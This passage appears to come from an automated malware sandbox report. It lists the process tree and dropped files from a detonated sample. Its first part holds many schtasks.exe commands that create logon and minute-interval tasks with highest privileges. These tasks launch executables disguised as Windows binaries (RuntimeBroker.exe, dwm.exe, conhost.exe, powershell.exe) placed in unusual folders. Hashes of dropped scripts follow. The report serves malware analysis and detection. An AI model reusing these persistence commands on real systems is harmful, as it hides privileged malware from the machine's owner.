schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Public\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 5 /tr "'C:\Users\Public\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Windows\AppPatch\en-US\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\AppPatch\en-US\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Windows\AppPatch\en-US\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\it-IT\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\it-IT\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Media Player\it-IT\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\DriverSavessessionbroker\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:60

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\DriverSavessessionbroker\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\DriverSavessessionbroker\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\ApplicationFrameHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\ApplicationFrameHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\ApplicationFrameHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:60

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Program Files\WindowsPowerShell\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2224

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5636

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
PID:5440

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.0.1219641373\1493603097" -parentBuildID 20221007134813 -prefsHandle 1672 -prefMapHandle 1660 -prefsLen 20767 -prefMapSize 233414 -appDir "C:\Program Files\Mozilla Firefox\browser" - {23760b65-69ad-4c8b-9c2e-4b7a0ff708b9} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 1764 1d8d5108f58 gpu
3⤵
PID:5932

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.1.1049821171\123744196" -parentBuildID 20221007134813 -prefsHandle 2112 -prefMapHandle 2108 -prefsLen 20848 -prefMapSize 233414 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d957d33-98c6-4816-b1be-e4d2e03fb789} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 2132 1d8d3def458 socket
3⤵
PID:220

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.2.1660524114\2054453508" -childID 1 -isForBrowser -prefsHandle 2708 -prefMapHandle 2860 -prefsLen 20951 -prefMapSize 233414 -jsInitHandle 1076 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {28e98e0a-aa5d-4715-9971-f61d3d448fee} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 2836 1d8d81aab58 tab
3⤵
PID:5608

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.3.1746368108\1294304129" -childID 2 -isForBrowser -prefsHandle 3340 -prefMapHandle 3320 -prefsLen 26136 -prefMapSize 233414 -jsInitHandle 1076 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f144eb98-8878-4f1e-9246-a0b55c95e4bd} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 3344 1d8d9005c58 tab
3⤵
PID:5796

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.4.2063498635\429182675" -childID 3 -isForBrowser -prefsHandle 4560 -prefMapHandle 4556 -prefsLen 26195 -prefMapSize 233414 -jsInitHandle 1076 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {42cf5dbe-4f89-485e-a842-6b38ec75addc} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 3716 1d8d8289358 tab
3⤵
PID:6148

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.5.136252948\774410168" -childID 4 -isForBrowser -prefsHandle 4840 -prefMapHandle 4836 -prefsLen 26195 -prefMapSize 233414 -jsInitHandle 1076 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0936caa-5cf7-4697-8dda-a6c4266a10fa} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 4848 1d8d82a6158 tab
3⤵
PID:6548

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.6.1552959729\809823153" -childID 5 -isForBrowser -prefsHandle 4988 -prefMapHandle 4992 -prefsLen 26195 -prefMapSize 233414 -jsInitHandle 1076 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ef2cce2-45a7-41c9-be48-47f3c9c42ff2} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 4980 1d8da589858 tab
3⤵
PID:6556

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.7.1274232708\908965876" -childID 6 -isForBrowser -prefsHandle 5184 -prefMapHandle 5188 -prefsLen 26195 -prefMapSize 233414 -jsInitHandle 1076 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ba5b16f-552e-4b20-8cbc-4dcc63050b76} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 5176 1d8da588658 tab
3⤵
PID:6580

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.8.1863316258\600430745" -childID 7 -isForBrowser -prefsHandle 1524 -prefMapHandle 4396 -prefsLen 26274 -prefMapSize 233414 -jsInitHandle 1076 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c8ede420-52af-4fa7-b626-f80e36b1b0de} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 2572 1d8d743d558 tab
3⤵
PID:6192

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.9.624666713\966715900" -childID 8 -isForBrowser -prefsHandle 5808 -prefMapHandle 5804 -prefsLen 26274 -prefMapSize 233414 -jsInitHandle 1076 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e6e54de-8143-4be3-8ba2-fb8fc099625a} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 5816 1d8db48b258 tab
3⤵
PID:6252

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.10.237682869\839584251" -parentBuildID 20221007134813 -prefsHandle 5504 -prefMapHandle 5532 -prefsLen 26274 -prefMapSize 233414 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdd7b5bb-0b7a-4e55-a2e0-48b19060444e} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 1580 1d8db48ee58 rdd
3⤵
PID:892

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.11.1729795669\66493088" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5756 -prefMapHandle 5744 -prefsLen 26274 -prefMapSize 233414 -appDir "C:\Program Files\Mozilla Firefox\browser" - {497235e1-8567-4c9b-a43d-dfa868ca99d2} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 5732 1d8db59e858 utility
3⤵
PID:6480

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.12.970969251\291780955" -childID 9 -isForBrowser -prefsHandle 6160 -prefMapHandle 6156 -prefsLen 26539 -prefMapSize 233414 -jsInitHandle 1076 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5aa63e8-d4e9-4b90-997b-46271730c33c} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 6172 1d8db48b858 tab
3⤵
PID:1056

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.13.1937916682\1939394461" -childID 10 -isForBrowser -prefsHandle 4476 -prefMapHandle 4472 -prefsLen 26714 -prefMapSize 233414 -jsInitHandle 1076 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f711212f-8806-4901-925e-7f3b1dc44eed} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 4244 1d8d41ad858 tab
3⤵
PID:4252

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5440.14.765565127\1978425348" -childID 11 -isForBrowser -prefsHandle 6008 -prefMapHandle 6028 -prefsLen 26714 -prefMapSize 233414 -jsInitHandle 1076 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd673794-0f30-4acc-8b6b-7f93bd1ae812} 5440 "\\.\pipe\gecko-crash-server-pipe.5440" 6012 1d8d41af358 tab
3⤵
PID:208

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\DriverSavessessionbroker\BB4HCuNIVdx078g7AY04mw7MSmeo.bat
Filesize
159B

MD5
d55b68123f0af3b57b68ce8498b9a56c

SHA1
c78f936b3b86ba733a704494c95356f931b283ac

SHA256
2a265dc6e087fca3bb14db7a48fbc93e8b5d3b1a77ab2c39b316d6843b71af3c

SHA512
a2a2cda2032c010deef8e3addcdca6b6c3f2b1d81941724c45bd8d8d2f81d777e23dc7c4f59481f590cfc633167ed3161baf65f135e1154e1b767920cf34afde

Download Submit
C:\DriverSavessessionbroker\containerPerf.exe
Filesize
1.3MB

MD5
48c2137034bee9bdfc2c9df1e71e9e04

SHA1
573e8453bc08e2b4e8e65b8560d81b150a9acdd8

SHA256
54559193c7dc48fc6e2d0e2115eaaaf9ffd48b4aa40350673b6b93bdc6c92d88

SHA512
5c854bfa2b963039db83cf764ea0ddb513c612896c325acdd944bbb115858153cac15addbf18da208cf8753b60f774e7a61e0540fd82445f29f9d47a31c2b247

Download Submit
C:\DriverSavessessionbroker\xFrhwR4IIWv.vbe
Filesize
229B

MD5
dc6d3bc19c948df2fda4cf8dbfcf3733

SHA1
a7def52ce2b412ded4ec6d92f33017b39e32398c

SHA256
4f493dc39aaeb060106380100db44268cb35b7638bf345e4e31f0b62aca8d01c

SHA512
a0ceed57ffcee59907042323f37eda2e8d2382fdd6440e70f5ffa7fad969c0be79946b871004423e78e336299920927470858c9712eaf8e7fca31ebd01201cae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\containerPerf.exe.log
Filesize
1KB

MD5
dc165da52c9ab2920b0130ff15992d1b

SHA1
9adc2325af7c2a2c4142d9dfdd62becb948882b6

SHA256
03027449eb7537e6e3bd1b435dd699ad8ced7b036cac426f5e87a774bed3b540

SHA512
a6aa4e4e1570822888c25ae6d2ded984f216509a2f185aa0adecc611da40e40afd3a74c507d22793fa4fe4a7189cc9add4d24eaf13d264cd3aa85ed234a0eb5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
09c79916f65aac3a8d061162a88483ce

SHA1
824216739ecd90c32e673aefb8037c62fb118ad2

SHA256
7534fe2f13fc37d4a996b8ca847a48cba38dda58597b508df5dbdd3fc49540f6

SHA512
545b7fa731f49801d9c11440aeae95301824549bd16026a5b79a6707598ced971d1fdd1cde02485ec2499d3b7b239a7b1f1653fbf8dd3801b3d3fcd69ae3a9d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
238c343dfd0db2cad3d3d97251aa2fb7

SHA1
74522e1cdc8e7dca30ab8eea2f6e905256d168b9

SHA256
85e0474296a49dcbcf665693325e6dabc68ede66885a690a86d7cc99a8e2e596

SHA512
e363fa35fd691c897391b274ca5d46a5c22c2bf446f563343b26ed013fe3fdbd1e51da8bf3c43662cb818b2164f78bc7d4a2eb817c3209f4def763d496bb511e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3ec2ee868864bbacc03566a529406efa

SHA1
179f64340358e8f7a37d8e4fc39bacb54a2ca457

SHA256
b41c203449741fdfec6776f4b37bdf6e79420cd1ef7b50ac87ce2cd2bd4b3af4

SHA512
09b6a6481f8b272f07e6d4619f759ca2fe4f68321ee5fa83dff366a36f2ff973956c3f853e28bcc6ec9e7f08522ebb0348b46dae3b21f989cb95391d01e7ccf0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2085211b171add12867d54da1c4a9aec

SHA1
6a38ed0e5889a6ab4af84dc5e68e1f7789bd2e9a

SHA256
2b46ab40f00d3f0189747598160fa7ed5e4130b540a2bd297754ce1b3667af5b

SHA512
7337a0f75c5e55708976f878e5caaa31c6111b7a06f6d3e4926cc31d765fdd7ed151fbe4bff68de614b16aafe555f8800f4f7a2d8d462d261837bb2dec44fa4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b586af169b3f1015d68dfe849b36fa06

SHA1
2a4d5ec31eb1672905d8cc48a58b1dc4f308c055

SHA256
1f3a42c0e8a04f9e593881b5bc5b225207f884cec7f0cf5080073bf6dc207c56

SHA512
1aebb7137a8355e682365575f351b85e5fa9884f0ed33e1023d1ecb92b51c729ab85ad024ca893556061582b40209cc2e68df6519b4d2dcc9d6ea6e3b9ad8028

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
09e311fe3ba14609e467c668772b23ef

SHA1
e4eb1b9cb738ef34ff046ea7675573c506ec5556

SHA256
3edb2641b916e512f70bbf17ba2c8086e18ec0c49d95e5133160c04c82f3c938

SHA512
2591220e67746a1a88f893adc055a8b3db1ffc69a573f784ad28b2995be25df395cba44e7ba616a41b57b5341f7413654d2e3ddf7c17583ab42f2718a6531081

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
caff0d442dd08ed4ffa8ac0d101c0d4f

SHA1
d175495d56040597f9d1534d857aaab9334c03b3

SHA256
bf2e5b82a40e6cc3ba23ea30535a1280f66f2eec269a5157168b9aad551c7af7

SHA512
154a06123fed8afce42e998f540227288576ff9ecec27d244e2ea0a84ef2b45ad44ed6a4020995c05252f351db397ed654cce93a9e393654e662f13a55b3fc1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c2193e924049ec99d5dc2dce8f83e3a8

SHA1
bcae395e9eed435d695e9ad8c299337f01444acc

SHA256
42749a57b12401bb82ce3eee45553f57384621512c7f0030cc83500eeb10ce7c

SHA512
5ee1e8040b894494a5140a43df02c336b21f126d1e471fb4c0a75918de06beffbef4ed3768595a0c8290d1d92e8bf863b8c38bdc1fa422abefa5fa48034a9907

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
59bc140384152b8a4ed38ba8b72a877b

SHA1
25e5c7346d7f78d077f213b004804ac2808544a6

SHA256
4e6458e32baf230fb0d973e73ccc0469b158b9ea81ad44ea9da7e63c1e9c22d9

SHA512
8efd1d96689d3c715dabf1a1219253833a21e911a32780a60cf10ef10416bef988b2da36e801418c8678ca58a5d1c2869b8ff0c133cfefc295c75a05f47f8836

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5d92a55695c67f4a4253e7c10b584f1b

SHA1
040c812f38d5e66ba2f8d1409b37f31c0b3ee1d7

SHA256
e120d97583a0ec93e028ad21331b60e35d601fa0eb34f5588160fe02a3a87a02

SHA512
6c58ef84578cb3c9190011f2ecf70cc4faf1c910b375cafcf29acdaaac9ee3b00e434cb881d6fdfb746a89b921f4e037fbed001c3230634359d006f19b857900

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
402df487db1a008e927f7f1f75f0eb30

SHA1
2d42f7414ea64fc76e411aebf2a917cd16bf9bf4

SHA256
2cb06d78c3e3d7d8920bd58aa3de1f8bf6e5507c73a81594a4d55166a9b20733

SHA512
daa48e6014d499239388b68793e3a981dcf696a115df2db2961066bf7df95b0d0733d6396eaf0511e3cea130d3c29282993091b52d06e4584f48b9f5b10a07bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3a664255c97733804f7f63100d93cbd6

SHA1
a3075d899b36ee98e9cc2f85c9eb8df3a20abcf9

SHA256
ab128874f205d3d7c305b6a8ab946e8268da98093110046ec42693e563040dce

SHA512
3a36b4e8c6a1e8376ba667813a87f615deeb0b533d52a38941a0cd23b57fe10a8c2b12db6828d7c7ce345527eb1a45c64adf4bcd46d77576288d2b4b946dc813

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
22334333ce770c88dd33f8098cd6c15e

SHA1
2da000a38a713d3e5e3efa56387ca8060f48c18b

SHA256
b9b4d7f79f06ec6bfe5b978739e3587afb21fd57b4f2a6688debca8163a3ed99

SHA512
3b04e7974b50e387fd6611673edfe1e9c4d004fa5c244aaadd2bff581288069d618178c80e5a0ec43c02e3fc4e4edd8116538a0091604379735272666556b059

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2b7acdhd.default-release\activity-stream.discovery_stream.json.tmp
Filesize
35KB

MD5
105c438d1824b833ab53d44657e3cf1f

SHA1
81fcfea28633ec8c3b4326c489c2382d4b845255

SHA256
47e4eca4c855a6862db89c85044bce899a59e9ed5781e7eaa3ec5c9fdb7de179

SHA512
c0bb66d0355f99d331e143afe2696e29c91d03b896f34b1836cb4cbe31a63d2a0ce74acee1402ba16b065b8500a153d5a421e67d466edfde546f51982940f2c3

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2b7acdhd.default-release\cache2\doomed\17389
Filesize
8KB

MD5
bcb1ff56556c246563dc24798a395049

SHA1
73ac43391cbf53e76e53b2fe8274a3a2045a9fa0

SHA256
5137dbaf1cae907a854158bdbc71ce3e89d4d99c1294c8dda93bc0085c85524e

SHA512
0748cac862a8575a422842a702b65e7619c16a4fa2c526056dcca3a70f1ca3e7de9754aec99484419616a093b43aec52cdf515548afcaee2148ddfb2f1f9788a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2b7acdhd.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize
7KB

MD5
c460716b62456449360b23cf5663f275

SHA1
06573a83d88286153066bae7062cc9300e567d92

SHA256
0ec0f16f92d876a9c1140d4c11e2b346a9292984d9a854360e54e99fdcd99cc0

SHA512
476bc3a333aace4c75d9a971ef202d5889561e10d237792ca89f8d379280262ce98cf3d4728460696f8d7ff429a508237764bf4a9ccb59fd615aee07bdcadf30

Download Submit
C:\Users\Admin\AppData\Local\Temp\3npectBbsF.bat
Filesize
214B

MD5
dbd0ea345d56d021e1aefd1f3053f26e

SHA1
58d5d4994c67cfc7dc31d5f97d1671860d69748b

SHA256
ff631d068a4672c8687a80c4e231518b8761479532c4b4ffc4a8a5b2984b0d09

SHA512
12ebdba796819dbac9c6244df260ee85eca400975a075acd8883502e0cff3b6e60d8680e45e3b24011857631c3c666e816f999eed0ba6c5406a6d73287e00140

Download Submit
C:\Users\Admin\AppData\Local\Temp\42420c71-fd45-4129-9c72-32aa3d85dd5d.vbs
Filesize
725B

MD5
fba8e94212ee2841b98868f6e5986762

SHA1
c83f6205acd1b3634af9006194c8ee6ac08c2a35

SHA256
30a984ff0eff29ab561b67c6723b3e97e39229dc11cdb00006ba738abe2ea09c

SHA512
a2a5e71ac6eab1b5800aeb87031a5a7915fa9a0b3663e396c4f1ed07db78c51ac402c00ee6f3c3da81de2538988e200838191970a01862b482b1e913bfc0bb77

Download Submit
C:\Users\Admin\AppData\Local\Temp\4f08cea4-f4f5-4895-93c0-14128c68a49d.vbs
Filesize
725B

MD5
ff6c150ec74bc85504fcf67b76884c3a

SHA1
be4a99a4e9f2d24592e137d229a0eabe298aae86

SHA256
3703f54f0ebc8599425474f2e5f14556ff717f2f0d91c4811b811866b4fe1338

SHA512
7760db141992125429685f8d560461adede29bb3f7f8d49fd026e71251ea9c9344ed8fd68635e9bc8a94a64c1ec7601b93d002a06b247ad6227a94d9fa44aec1

Download Submit
C:\Users\Admin\AppData\Local\Temp\53b6b892-4054-4f11-8ff5-b4b1e278fc5f.vbs
Filesize
725B

MD5
04d2d090e55198792abb513e55a199c5

SHA1
fe2bfdd47d66a89ee19252557abc4828337ec821

SHA256
d02032bc02d98bd36312fc28e617eaf47bce4b4f145b77833e32d699d3a0ef38

SHA512
d0621901d79d9a99463d48dd2c1fededa4a144c28a074ae471750270999ed4f0ac373d6df625682be20890cd18ca63b35d42ae17ed34da359e8a9e078a851e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\BYj1kG62r9.bat
Filesize
214B

MD5
0520fca6cd48edd7ada38cda29b9dcb7

SHA1
953bae32ec95286d9bd1f4745e1031a49fcc1ed0

SHA256
92cb46ed10703d6373d43eb7ce8ef6676b1bce0172d36bf22f91227cc1a575f9

SHA512
b98ecef0c17758cda01299788913e7bb0ab0e9390550b792807b90ee6f9439602dd5bc6f5e221fcc137f47705da5ae37c5eb6974093fce65be96e1c6fd16a97c

Download Submit
C:\Users\Admin\AppData\Local\Temp\HPJZN0gsBU.bat
Filesize
214B

MD5
9a7ec35c3e739959fc778ed400072f1b

SHA1
b190a22e7b98eb1f567ff21666e3b4b278b39078

SHA256
a4445398cfb99e6e6b1e120583560e07c7f285487c545658c8f2fb9bb43356e3

SHA512
e2a828b33d8eb1d43f18f7cec4c8d515d21edd6dced6b27a7cf3f0536562a74ba2aa884655bcfe3a82ba3ec17a728567f606c6f0f5b123491f6e7c48477aab6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hypt05pf.zon.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\a14daa3a-0019-49a2-abbe-62f78859399c.vbs
Filesize
725B

MD5
7fb8ae65639fef20b414d2a741f84350

SHA1
7de590c2f9966753541766ed6ddc137ad83e6e6c

SHA256
ba4eb8aa1ecf7804c7dfbe1c146ffe483c63a8d1479648d787c7de8e3b6bcc98

SHA512
